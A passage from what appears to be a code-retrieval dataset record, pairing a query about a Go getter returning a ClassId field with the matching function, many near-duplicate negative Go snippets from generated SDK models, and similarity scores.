Params{\n\t\tKeyLength: 512,\n\t\tInternalSaltLength: 256,\n\t\tExternalSaltLength: 256,\n\t\tArgon2Memory: 64 * 1024,\n\t\tArgon2Iterations: 3,\n\t\tArgon2Parallelism: 4}\n\treturn &p\n}", "func NewVulnUpdateNotificationPayloadAllOfWithDefaults() *VulnUpdateNotificationPayloadAllOf {\n\tthis := VulnUpdateNotificationPayloadAllOf{}\n\treturn &this\n}", "func (pc *PetCreate) defaults() {\n\tif _, ok := pc.mutation.Age(); !ok {\n\t\tv := pet.DefaultAge\n\t\tpc.mutation.SetAge(v)\n\t}\n\tif _, ok := pc.mutation.Trained(); !ok {\n\t\tv := pet.DefaultTrained\n\t\tpc.mutation.SetTrained(v)\n\t}\n}", "func setDefaultValues() {\n\tviper.SetDefault(constant.RESOURCE_FILES_MANDATORY, util.ResourceFiles_Mandatory)\n\tviper.SetDefault(constant.RESOURCE_FILES_OPTIONAL, util.ResourceFiles_Optional)\n\tviper.SetDefault(constant.RESOURCE_FILES_SKIP, util.ResourceFiles_Skip)\n\tviper.SetDefault(constant.PLATFORM_VERSIONS, util.PlatformVersions)\n}", "func (o *GetKeyBlockByHeightParams) SetDefaults() {\n\t// no default values defined for this parameter\n}", "func (vc *VehicleCreate) defaults() error {\n\tif _, ok := vc.mutation.CreatedAt(); !ok {\n\t\tif vehicle.DefaultCreatedAt == nil {\n\t\t\treturn fmt.Errorf(\"ent: uninitialized vehicle.DefaultCreatedAt (forgotten import ent/runtime?)\")\n\t\t}\n\t\tv := vehicle.DefaultCreatedAt()\n\t\tvc.mutation.SetCreatedAt(v)\n\t}\n\tif _, ok := vc.mutation.UpdatedAt(); !ok {\n\t\tif vehicle.DefaultUpdatedAt == nil {\n\t\t\treturn fmt.Errorf(\"ent: uninitialized vehicle.DefaultUpdatedAt (forgotten import ent/runtime?)\")\n\t\t}\n\t\tv := vehicle.DefaultUpdatedAt()\n\t\tvc.mutation.SetUpdatedAt(v)\n\t}\n\treturn nil\n}", "func NewConnectorTypeAllOfWithDefaults() *ConnectorTypeAllOf {\n\tthis := ConnectorTypeAllOf{}\n\treturn &this\n}", "func NewGetMessagesAllOfWithDefaults() *GetMessagesAllOf {\n\tthis := GetMessagesAllOf{}\n\treturn &this\n}", "func (mi *MinIOInstance) EnsureDefaults() *MinIOInstance {\n\tif mi.Spec.Replicas == 0 {\n\t\tmi.Spec.Replicas = constants.DefaultReplicas\n\t}\n\n\tif mi.Spec.PodManagementPolicy == \"\" || (mi.Spec.PodManagementPolicy != appsv1.OrderedReadyPodManagement &&\n\t\tmi.Spec.PodManagementPolicy != appsv1.ParallelPodManagement) {\n\t\tmi.Spec.PodManagementPolicy = constants.DefaultPodManagementPolicy\n\t}\n\n\tif mi.Spec.Image == \"\" {\n\t\tmi.Spec.Image = constants.DefaultMinIOImage\n\t}\n\n\tif mi.Spec.Mountpath == \"\" {\n\t\tmi.Spec.Mountpath = constants.MinIOVolumeMountPath\n\t} else {\n\t\t// Ensure there is no trailing `/`\n\t\tmi.Spec.Mountpath = path.Clean(mi.Spec.Mountpath)\n\t}\n\n\tif mi.Spec.Subpath == \"\" {\n\t\tmi.Spec.Subpath = constants.MinIOVolumeSubPath\n\t} else {\n\t\t// Ensure there is no `/` in beginning\n\t\tmi.Spec.Subpath = path.Clean(mi.Spec.Subpath)\n\t}\n\n\tif mi.RequiresAutoCertSetup() == true {\n\t\tif mi.Spec.CertConfig != nil {\n\t\t\tif mi.Spec.CertConfig.CommonName == \"\" {\n\t\t\t\tmi.Spec.CertConfig.CommonName = mi.GetWildCardName()\n\t\t\t}\n\t\t\tif mi.Spec.CertConfig.DNSNames == nil {\n\t\t\t\tmi.Spec.CertConfig.DNSNames = mi.GetHosts()\n\t\t\t}\n\t\t\tif mi.Spec.CertConfig.OrganizationName == nil {\n\t\t\t\tmi.Spec.CertConfig.OrganizationName = constants.DefaultOrgName\n\t\t\t}\n\t\t} else {\n\t\t\tmi.Spec.CertConfig = &CertificateConfig{\n\t\t\t\tCommonName: mi.GetWildCardName(),\n\t\t\t\tDNSNames: mi.GetHosts(),\n\t\t\t\tOrganizationName: constants.DefaultOrgName,\n\t\t\t}\n\t\t}\n\t}\n\n\treturn mi\n}", "func NewDefaults() map[string]interface{} {\n\tdefaults := make(map[string]interface{})\n\n\tdefaults[authPostgresURI] = \"postgresql://postgres:postgres@localhost:5432/test?sslmode=disable\"\n\tdefaults[authMigrationVersion] = 0\n\n\tdefaults[gatewayAddr] = \":10000\"\n\tdefaults[gatewayEndpoint] = \"/graphql\"\n\tdefaults[gatewayServePlayground] = true\n\tdefaults[gatewayPlaygroundEndpoint] = \"/playground\"\n\tdefaults[gatewayEnableIntrospection] = true\n\n\tdefaults[seedUserLogin] = \"root\"\n\tdefaults[seedUserPassword] = \"root\"\n\tdefaults[seedRoleTitle] = \"ROOT\"\n\tdefaults[seedRoleSuper] = true\n\n\tdefaults[sessionAccessTokenTTL] = 1000000\n\tdefaults[sessionRefreshTokenTTl] = 5000000\n\n\treturn defaults\n}", "func newDefaultConfig() *Config {\n\treturn &Config{\n\t\tcpuidConfig{\n\t\t\tAttributeBlacklist: []string{\n\t\t\t\t\"BMI1\",\n\t\t\t\t\"BMI2\",\n\t\t\t\t\"CLMUL\",\n\t\t\t\t\"CMOV\",\n\t\t\t\t\"CX16\",\n\t\t\t\t\"ERMS\",\n\t\t\t\t\"F16C\",\n\t\t\t\t\"HTT\",\n\t\t\t\t\"LZCNT\",\n\t\t\t\t\"MMX\",\n\t\t\t\t\"MMXEXT\",\n\t\t\t\t\"NX\",\n\t\t\t\t\"POPCNT\",\n\t\t\t\t\"RDRAND\",\n\t\t\t\t\"RDSEED\",\n\t\t\t\t\"RDTSCP\",\n\t\t\t\t\"SGX\",\n\t\t\t\t\"SGXLC\",\n\t\t\t\t\"SSE\",\n\t\t\t\t\"SSE2\",\n\t\t\t\t\"SSE3\",\n\t\t\t\t\"SSE4\",\n\t\t\t\t\"SSE42\",\n\t\t\t\t\"SSSE3\",\n\t\t\t\t\"TDX_GUEST\",\n\t\t\t},\n\t\t\tAttributeWhitelist: []string{},\n\t\t},\n\t}\n}" ]
[ "0.7302019", "0.7197099", "0.6901963", "0.68930364", "0.66952777", "0.6453485", "0.61395067", "0.610039", "0.6019124", "0.59342843", "0.58286214", "0.5814285", "0.5803453", "0.57177156", "0.5695191", "0.5685849", "0.56805533", "0.55701065", "0.5556591", "0.5554377", "0.554983", "0.55348796", "0.5529891", "0.55236274", "0.54951304", "0.54890466", "0.5485708", "0.54798937", "0.547037", "0.5465841", "0.5458894", "0.54418397", "0.5434383", "0.54328316", "0.5425084", "0.5423401", "0.5416874", "0.54041237", "0.53937995", "0.53872496", "0.5375797", "0.5363447", "0.53608626", "0.53507286", "0.53411865", "0.5326626", "0.5317816", "0.53177965", "0.53141475", "0.5311757", "0.5304698", "0.5297976", "0.52914065", "0.52822065", "0.52666634", "0.5264707", "0.5258281", "0.5238145", "0.5215435", "0.5215152", "0.52118737", "0.52103496", "0.52056456", "0.5190452", "0.51862794", "0.5185352", "0.5182437", "0.5180276", "0.51716185", "0.5170789", "0.51697195", "0.51661026", "0.51615006", "0.5154931", "0.5146658", "0.51458174", "0.5141235", "0.5140623", "0.5137002", "0.51335716", "0.5124626", "0.51209307", "0.5113873", "0.5102435", "0.50961214", "0.50884444", "0.5087373", "0.5071881", "0.5071763", "0.50664806", "0.5065079", "0.50626856", "0.506101", "0.5059364", "0.5058327", "0.50546014", "0.50517994", "0.5040439", "0.5038305", "0.50263375" ]
0.8176324
0
GetClassId returns the ClassId field value
func (o *CloudAwsVirtualMachineAllOf) GetClassId() string { if o == nil { var ret string return ret } return o.ClassId }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (o *OpenapiTaskGenerationResult) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *HyperflexReplicationPlatDatastore) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *AssetNewRelicCredential) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (m *CalendarGroup) GetClassId()(*i561e97a8befe7661a44c8f54600992b4207a3a0cf6770e5559949bc276de2e22.UUID) {\n val, err := m.GetBackingStore().Get(\"classId\")\n if err != nil {\n panic(err)\n }\n if val != nil {\n return val.(*i561e97a8befe7661a44c8f54600992b4207a3a0cf6770e5559949bc276de2e22.UUID)\n }\n return nil\n}", "func (o *ServerConfigImportAllOf) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *NiaapiRevisionInfoAllOf) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *HyperflexVirtualMachineAllOf) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *VirtualizationIweHost) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *HyperflexVmSnapshotInfoAllOf) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *BulkResult) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *IamServiceProviderAllOf) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *HyperflexSoftwareVersionPolicy) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *StorageHitachiPortAllOf) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *HyperflexEncryption) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *HyperflexServerFirmwareVersionEntryAllOf) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *StorageSasExpander) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *ComputeBladeIdentityAllOf) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *RackUnitPersonality) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *CloudInstanceTypeAllOf) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *HyperflexMapClusterIdToProtectionInfoAllOf) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *EquipmentIdentityAllOf) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *StorageRemoteKeySetting) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *WorkflowSshCmdAllOf) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *VirtualizationVmwareVirtualMachineAllOf) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *EquipmentBaseSensor) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *VirtualizationIweVirtualMachine) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *HyperflexHxapDvUplink) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *NetworkDns) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *FirmwareHttpServer) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *NiaapiNewReleaseDetailAllOf) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *InventoryBaseAllOf) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *WorkflowSshCmd) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *EquipmentIoCardBase) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *IamLdapBasePropertiesAllOf) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *WorkflowCliCommandAllOf) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *HclFirmware) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *WorkflowCustomDataProperty) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *StorageFlexUtilVirtualDrive) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *EquipmentFanModule) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *StorageSpaceAllOf) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *SdwanRouterNode) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *StorageNetAppHighAvailability) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *SoftwarerepositoryLocalMachineAllOf) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *EquipmentFanControl) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *MacpoolLeaseAllOf) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *ApplianceSetupInfoAllOf) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *HyperflexClusterHealthCheckExecutionSnapshot) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *StorageBaseCapacity) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *InventoryBase) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *ConvergedinfraServerComplianceDetailsAllOf) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *StorageVdMemberEpAllOf) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *StorageHitachiVolumeMigrationPair) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *WorkflowBuildTaskMeta) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *WorkflowCatalogServiceRequest) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *HyperflexSnapshotStatus) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *StorageEnclosure) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *UcsdBackupInfoAllOf) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *StorageFlexFlashVirtualDrive) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *TechsupportmanagementEndPointAllOf) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *NiatelemetryDigitalOpticalMonitoring) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *StoragePhysicalDiskAllOf) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *FabricFlowControlPolicyAllOf) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *EtherHostPort) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *IamIpAddress) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *StoragePhysicalDisk) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *IamLdapProviderAllOf) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *StorageNetAppCloudTargetAllOf) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *WorkflowWorkflowDefinitionAllOf) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *CloudVolumeInstanceAttachment) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *StorageHyperFlexStorageContainer) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *ForecastModelAllOf) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *IaasMostRunTasksAllOf) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *MemoryArrayAllOf) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *EquipmentLocatorLed) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *NiatelemetryNicc) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *NetworkLicenseFile) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *IamUserPreferenceAllOf) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *VirtualizationIweClusterAllOf) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *SoftwarerepositoryCategoryMapper) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *IamLdapConfigParamsAllOf) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *WorkflowServiceItemDefinitionAllOf) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *StoragePhysicalDiskExtension) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *OsInstallAllOf) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *EtherPhysicalPort) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *ApplianceDeviceClaimAllOf) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *HyperflexHealthCheckNodeLevelInfoAllOf) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *OnpremUpgradeNoteAllOf) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *MemoryPersistentMemoryConfiguration) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *ResourcepoolPoolMember) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *FeedbackFeedbackPost) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *StorageNetAppSnapshotPolicySchedule) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *ConnectorXmlApiMessageAllOf) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *OpenapiProcessFileAllOf) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *FcNeighborAllOf) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *WorkflowServiceItemActionInstance) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (m *EducationAssignment) GetClassId()(*string) {\n return m.classId\n}", "func (o *WorkflowSolutionActionDefinition) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *NiatelemetryNveVni) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *NotificationAccountSubscriptionAllOf) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}", "func (o *OnpremUpgradePhase) GetClassId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ClassId\n}" ]
[ "0.82898444", "0.8258291", "0.82209325", "0.81948376", "0.8191493", "0.8158585", "0.81567526", "0.81505334", "0.8139441", "0.8123383", "0.81205016", "0.81136465", "0.81079423", "0.8102243", "0.80930865", "0.8080256", "0.8075293", "0.8063548", "0.804848", "0.8048238", "0.80253816", "0.80227", "0.8015143", "0.79897904", "0.79883873", "0.7986073", "0.7983532", "0.79819477", "0.7973137", "0.79639274", "0.79626215", "0.7958438", "0.7949988", "0.79474354", "0.7944124", "0.7936957", "0.7935644", "0.7929189", "0.7927433", "0.79270256", "0.79224944", "0.7915692", "0.79154223", "0.79128695", "0.789786", "0.78887933", "0.78831303", "0.78792995", "0.7877302", "0.7876931", "0.786768", "0.7859809", "0.78577065", "0.78537863", "0.785317", "0.78528154", "0.78523767", "0.78456813", "0.7844154", "0.7842029", "0.78404003", "0.7837681", "0.7837227", "0.7835538", "0.7830153", "0.7827935", "0.78221047", "0.7820415", "0.7815861", "0.78068024", "0.7797104", "0.7796642", "0.7784356", "0.778214", "0.7772255", "0.77677315", "0.7760071", "0.7758698", "0.7758282", "0.77567077", "0.77521765", "0.77483267", "0.7747845", "0.7736912", "0.77353406", "0.7733827", "0.7710775", "0.7709967", "0.7705244", "0.7704425", "0.7699387", "0.7691901", "0.767518", "0.7666391", "0.76630294", "0.76513714", "0.76491046", "0.76247793", "0.7613487", "0.760629" ]
0.78986764
44
GetClassIdOk returns a tuple with the ClassId field value and a boolean to check if the value has been set.
func (o *CloudAwsVirtualMachineAllOf) GetClassIdOk() (*string, bool) { if o == nil { return nil, false } return &o.ClassId, true }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (o *AssetNewRelicCredential) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *HyperflexEncryption) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *HyperflexReplicationPlatDatastore) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *WorkflowCustomDataProperty) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *StorageRemoteKeySetting) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *HyperflexSnapshotStatus) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *ServerConfigImportAllOf) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *HyperflexSoftwareVersionPolicy) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *EquipmentFanControl) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *EquipmentFanModule) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *EquipmentIdentityAllOf) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *CloudInstanceTypeAllOf) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *HclFirmware) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *WorkflowSshCmd) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *VirtualizationIweHost) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *VirtualizationIweVirtualMachine) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *ComputeBladeIdentityAllOf) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *HyperflexVirtualMachineAllOf) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *WorkflowSshCmdAllOf) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *WorkflowBuildTaskMeta) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *HyperflexHealthCheckPackageChecksum) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *OpenapiTaskGenerationResult) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *RackUnitPersonality) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *IamServiceProviderAllOf) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *FirmwareHttpServer) GetClassIdOk() (*string, bool) 